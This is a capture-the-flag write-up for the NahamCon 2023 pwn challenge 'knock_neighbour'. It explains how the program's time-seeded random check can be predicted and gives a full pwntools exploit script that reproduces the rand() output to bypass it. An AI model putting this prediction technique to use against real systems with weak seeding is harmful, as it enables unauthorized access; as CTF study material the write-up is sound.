Home knock_neighbout , NahamCon 2023
Post
Cancel

knock_neighbout , NahamCon 2023

Posted Jun 5, 2023
By Abdullah Shahbaz
2 min read

Description:

The program generates a random value at runtime using the current time as the seed. It then prompts the user for input and compares it to the previously generated random value. If the user’s input matches the generated value, the program prints the flag; otherwise, it terminates.

The vulnerability lies in the random value generation seed, which is based on the current time. To complete this challenge, you can create a program that generates the same random value by using the same seed (current time) at the exact moment the target program is executed. By sending this pre-generated value to the program, you can bypass the check and obtain the flag.

Protections

protection_1

Vulnerable Code

vuln_1 vuln_2 vuln_3

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

#!/usr/bin/python3
from pwn import *
import struct
import random
from ctypes import *

# context.terminal = ['tmux','splitw','-h']
os.environ['XDG_CACHE_HOME'] = '/tmp/'

context.log_level = 'error'

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''
break *main+301
continue
'''.format(**locals())

# Create bytearrays for the buffer and a temporary variable
buff = bytearray(0x3f)
temp_2 = bytearray(0x3f)

exe = './knock_neighbour'
elf = context.binary = ELF(exe, checksec=False)
exe_rop = ROP(elf, checksec=False)

libc = elf.libc
libc_rop = ROP(libc, checksec=False)

io = start()

# Load the libc library and get the current time
libc = cdll.LoadLibrary('libc.so.6')
time_1 = libc.time(0x0)
libc.srand(time_1)

# Generate random numbers and fill the buffers
for i in range(0x3f):
    temp = libc.rand()

    bVar1 = (temp >> 0x1f)
    buff[i] = (temp + (bVar1 >> 1) & 0x7f) - (bVar1 >> 1)
    temp_2[i] = buff[i]

padd = 104

# Set the payload as the generated buffer
payload = temp_2

# Send the first input
io.sendlineafter(b"Give me your lucky number:\n", b"1")

# Send the payload as the second input
io.sendafter(b"Give me your wish:\n", payload)

# Switch to interactive mode to interact with the exploited binary
io.interactive()
Pwn, amd64, ctf
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents